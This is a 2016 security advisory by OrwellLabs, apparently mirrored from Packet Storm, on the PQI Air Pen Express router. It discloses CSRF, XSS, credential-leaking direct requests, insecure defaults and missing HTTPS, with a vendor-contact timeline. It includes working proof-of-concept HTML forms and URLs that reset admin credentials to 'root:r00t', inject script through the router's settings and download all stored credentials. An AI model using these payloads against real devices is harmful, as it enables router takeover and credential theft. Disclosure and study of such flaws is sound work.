PQI Air Pen Express CSRF / XSS / Insecure Direct Object Reference

🗓️ 05 Apr 2016 00:00:00Reported by OrwellLabsType
packetstorm🔗 packetstormsecurity.com👁 34 Views
PQI Air Pen Express CSRF / XSS / Insecure Direct Object Referenc
` _ _ _ _  
| | | | | |  
___ _ ____ _____| | | | __ _| |__ ___  
/ _ \| '__\ \ /\ / / _ \ | | |/ _` | '_ \/ __|   
| (_) | | \ V V / __/ | | | (_| | |_) \__ \  
\___/|_| \_/\_/ \___|_|_|_|\__,_|_.__/|___/  
  
Security Adivisory  
2016-04-03  
www.orwelllabs.com  
Twitter:@orwelllabs  
  
magicword: d0ubl3th1nk1ng...  
  
  
Overview  
=======  
Technical Risk: high  
Likelihood of Exploitation: medium  
Vendor: PQI Group  
Affected Products: PQI Air Pen Express - Wireless Router 6W51-0000R2 and  
6W51-0000R2XXX  
Credits: Discovered and researched by Orwelllabs  
Adivisory URL:  
http://www.orwelllabs.com/2016/04/pqi-air-pen-express-wireless-router.html  
  
  
Issues  
=====  
I. Multiple Cross-Site Request Forgery (CSRF) (CWE-352)  
II. Multiple Stored Cross-site Scripting (CWE-79)  
III. Multiple Reflected Cross-Site Scripting (CWE-79)  
IV. Insecure Direct Request  
V. Insecure Default Permissions (CWE-276)  
VI. No SSL  
  
  
background  
=========  
The smart lipstick-shaped PQI Air Pen express is the world's smallest  
wireless router/access point combo you can get today.  
PQI Air Pen express can be powered via an external adapter or a powered USB  
port on your computer and provide a excellent wireless expreience for  
everyone.  
  
  
I. Cross-Site Request Forgery (CSRF) (CWE-352)  
```````````````````````````````````````````````````````````````````````  
If a user visits a page bellow, this will set the administrative credential  
for PQI Air Pen express to "root:r00t"  
  
<html>  
<!-- CSRF PoC -->  
<body>  
<form action="http://{airpenXweb}/goform/setSysAdm" method="POST">  
<input type="hidden" name="admuser" value="root" />  
<input type="hidden" name="admpass" value="r00t" />  
<input type="submit" value="Submit form" />  
</form>  
</body>  
</html>  
  
  
The attacker can also abuse of the multiple XSS in this device to exploit  
this vulnerability, something like this to set the same cred 'root:r00t'  
  
http://  
{airpenXweb}/goform/setWizard?connectionType=DHCP&ssid=%3Cscript%20src=%22  
http://airpenXweb/goform/setSysAdm?admuser=root&admpass=r00t%22%3E%3C/script%3E%3C!--  
  
  
The following poc will set the credential to access point to "3groot:3g00t"  
(and of course, any other value could be set in this way.)  
  
<html>  
<!-- CSRF PoC2 -->  
<body>  
<form action="http://{airpenXweb}/goform/setWan" method="POST">  
<input type="hidden" name="connectionType" value="DHCP" />  
<input type="hidden" name="staticIp" value="xxx.xxx.xxx.xxx" />  
<input type="hidden" name="staticNetmask" value="255.255.255.0"  
/>  
<input type="hidden" name="staticGateway"  
value="xxx.xxx.xxx.xxx" />  
<input type="hidden" name="staticPriDns" value="xxx.xxx.xxx.x"  
/>  
<input type="hidden" name="staticSecDns" value="xxx.xxx.xxx.x"  
/>  
<input type="hidden" name="hostname" value="" />  
<input type="hidden" name="pppoeUser" value="pppoe_user" />  
  
<input type="hidden" name="pppoePass" value="pppoe_passwd" />  
<input type="hidden" name="pppoePass2" value="pppoe_passwd" />  
<input type="hidden" name="pppoeOPMode" value="KeepAlive" />  
<input type="hidden" name="pppoeRedialPeriod" value="60" />  
<input type="hidden" name="pppoeIdleTime" value="5" />  
<input type="hidden" name="l2tpServer" value="l2tp_server" />  
<input type="hidden" name="l2tpUser" value="l2tp_user" />  
<input type="hidden" name="l2tpPass" value="l2tp_passwd" />  
<input type="hidden" name="l2tpMode" value="0" />  
<input type="hidden" name="l2tpIp" value="192.168.1.1" />  
<input type="hidden" name="l2tpNetmask" value="255.255.255.0"  
/>  
<input type="hidden" name="l2tpGateway" value="192.168.1.254"  
/>  
<input type="hidden" name="l2tpOPMode" value="KeepAlive" />  
<input type="hidden" name="l2tpRedialPeriod" value="60" />  
<input type="hidden" name="pptpServer" value="pptp_server" />  
<input type="hidden" name="pptpUser" value="pptp_user" />  
<input type="hidden" name="pptpPass" value="pptp_passwd" />  
<input type="hidden" name="pptpMode" value="0" />  
<input type="hidden" name="pptpIp" value="192.168.1.1" />  
<input type="hidden" name="pptpNetmask" value="255.255.255.0"  
/>  
<input type="hidden" name="pptpGateway" value="192.168.1.254"  
/>  
<input type="hidden" name="pptpOPMode" value="KeepAlive" />  
<input type="hidden" name="pptpRedialPeriod" value="60" />  
<input type="hidden" name="APN3G" value="" />  
<input type="hidden" name="PIN3G" value="" />  
<input type="hidden" name="Dial3G" value="" />  
<input type="hidden" name="User3G" value="3groot" /> < -- 3G  
User  
<input type="hidden" name="Password3G" value="3gr00t" /> <-- 3G  
Password  
<input type="hidden" name="Dev3G" value="Auto" />  
<input type="hidden" name="macCloneEnbl" value="0" />  
<input type="hidden" name="macCloneMac" value="" />  
<input type="submit" value="Submit form" />  
</form>  
</body>  
</html>  
  
  
II. Stored Cross-site Scripting (CWE-79)  
``````````````````````````````````````````````````````````  
"Wide Area Network (WAN) Settings"  
  
# PocParameter: "hostname"  
http://{airpenXweb}/goform/setWan?connectionType=DHCP&staticIp=xxx.xxx.xxx.xxx&staticNetmask=255.255.255.0&staticGateway=&staticPriDns=&staticSecDns=xxx.xxx.xxx.xxx&hostname=[  
* STOREDXSS  
*]&pppoeUser=pppoe_user&pppoePass=pppoe_passwd&pppoePass2=pppoe_passwd&pppoeOPMode=KeepAlive&pppoeRedialPeriod=60&pppoeIdleTime=5&l2tpServer=l2tp_server&l2tpUser=l2tp_user&l2tpPass=l2tp_passwd&l2tpMode=0&l2tpIp=192.168.1.1&l2tpNetmask=255.255.255.0&l2tpGateway=192.168.1.254&l2tpOPMode=KeepAlive&l2tpRedialPeriod=60&pptpServer=pptp_server&pptpUser=pptp_user&pptpPass=pptp_passwd&pptpMode=0&pptpIp=192.168.1.1&pptpNetmask=255.255.255.0&pptpGateway=192.168.1.254&pptpOPMode=KeepAlive&pptpRedialPeriod=60&APN3G=&PIN3G=&Dial3G=&User3G=&Password3G=&Dev3G=Auto&macCloneEnbl=0&macCloneMac=  
  
  
"Webs URL Filter Settings"  
  
# PocParameter: "addURLFilter"  
http://{airpenXweb}/goform/websURLFilter?addURLFilter=[ *STOREDXSS*  
]&addwebsurlfilter=Add  
  
Request in this page will show a pop-up with a content of javascript  
payload:  
http://{airpenXweb}/firewall/content_filtering.asp  
  
# Parameter: "addHostFilter"  
http://{airpenXweb}/goform/websHostFilter?addHostFilter=[ *STOREDXSS*  
]&addwebscontentfilter=Add  
  
  
III. Reflected Cross-Site Scripting (CWE-79)  
``````````````````````````````````````````````````````````````  
Virtually all application inputs are vulnerable to cross-site scripting,  
since it is not carried out any validation of the data provided by the  
user.  
Bellow are some examples:  
  
  
"Basic Wireless Settings"  
  
# PocParameter: "mssid_0"  
http://{airpenXweb}/goform/wirelessBasic?radiohiddenButton=2&wifihiddenButton=2&wirelessmode=9&bssid_num=1&mssid_0=[*  
XSS *  
]&mssid_1=&mssid_2=&mssid_3=&mssid_4=&mssid_5=&mssid_6=&mssid_8=&mssid_9=&mssid_10=&mssid_11=&mssid_12=&mssid_13=&mssid_14=&mssid_15=&broadcastssid=1&apisolated=0&mbssidapisolated=0&sz11gChannel=1&n_mode=0&n_bandwidth=1&n_gi=1&n_mcs=33&n_rdg=1&n_extcha=1&n_stbc=1&n_amsdu=0&n_autoba=1&n_badecline=0&n_disallow_tkip=1&n_2040_coexit=1&tx_stream=1&rx_stream=1  
  
# PocParameter: "ssid"  
http://{airpenXweb}/goform/setWizard?connectionType=DHCP&ssid=[ * XSS *  
]&security_mode=Disable&wzsecureAlgorithm=AES  
  
# PocParameter: "hostname"  
http://{airpenXweb}/goform/setWan?connectionType=[ -*- XSS  
-*-]&staticIp=xxx.xxx.xxx.xxx&staticNetmask=255.255.255.0&staticGateway=xxx.xxx.xxx.xxx&staticPriDns=xxx.xxx.xxx.xxx5&staticSecDns=203.185.0.36&hostname=tiat&pppoeUser=pppoe_user&pppoePass=pppoe_passwd&pppoePass2=pppoe_passwd&pppoeOPMode=KeepAlive&pppoeRedialPeriod=60&pppoeIdleTime=5&l2tpServer=l2tp_server&l2tpUser=l2tp_user&l2tpPass=l2tp_passwd&l2tpMode=0&l2tpIp=192.168.1.1&l2tpNetmask=255.255.255.0&l2tpGateway=192.168.1.254&l2tpOPMode=KeepAlive&l2tpRedialPeriod=60&pptpServer=pptp_server&pptpUser=pptp_user&pptpPass=pptp_passwd&pptpMode=0&pptpIp=192.168.1.1&pptpNetmask=255.255.255.0&pptpGateway=192.168.1.254&pptpOPMode=KeepAlive&pptpRedialPeriod=60&APN3G=&PIN3G=&Dial3G=&User3G=%3Cscript%3Ealert%281%29%3C/script%3E&Password3G=&Dev3G=Auto&macCloneEnbl=0&macCloneMac=  
  
# Parameter: "admpass"  
http://{airpenXweb}/goform/setSysAdm?admuser=root&admpass=[ -*- XSS -*- ]  
  
IV. Insecure Direct Request  
````````````````````````````````````````  
This device allows remote attackers to obtain sensitive information,  
including all credentials available via direct request to  
/cgi-bin/ExportSettings.sh.  
  
PoC:  
http://{airpenXweb}/cgi-bin/ExportSettings.sh  
  
V. Insecure Default Permissions (CWE-276)  
``````````````````````````````````````````````````````````````  
In the device description (on the Vendor's site) it is very clear that the  
priority is to  
facilitate everything for you, including setting. Therefore it is not  
mandatory that a password  
is configured for the web interface and not to connect to the AP, this way  
you can find hundreds  
of these completely unprotected APs.  
  
VI. No SSL  
``````````````````  
Any action, whether sensitive or not is transmitted in plain text because  
HTTPS is not used and no step.  
  
POST /goform/setSysAdm HTTP/1.1  
Host: xxx.xxx.xxx.xxx  
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:44.0) Gecko/20100101  
Firefox/44.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Referer: http://xxx.xxx.xxx.xxx/adm/management.asp  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 35  
  
admuser=ORWL_user&admpass=ORWL_pass  
  
Timeline  
=======  
2015-10-25 - Issues discovered  
2015-11-04 - Vendor contacted  
2015-12-12 - Another attempt to contact the Vendor...  
2016-02-26 - Public Disclosure  
* There is no easy way to contact the vendor. Emails sent remain unanswered  
and forms site contacts as well.  
  
`
05 Apr 2016 00:00Current
7.4High risk
Vulners AI Score7.4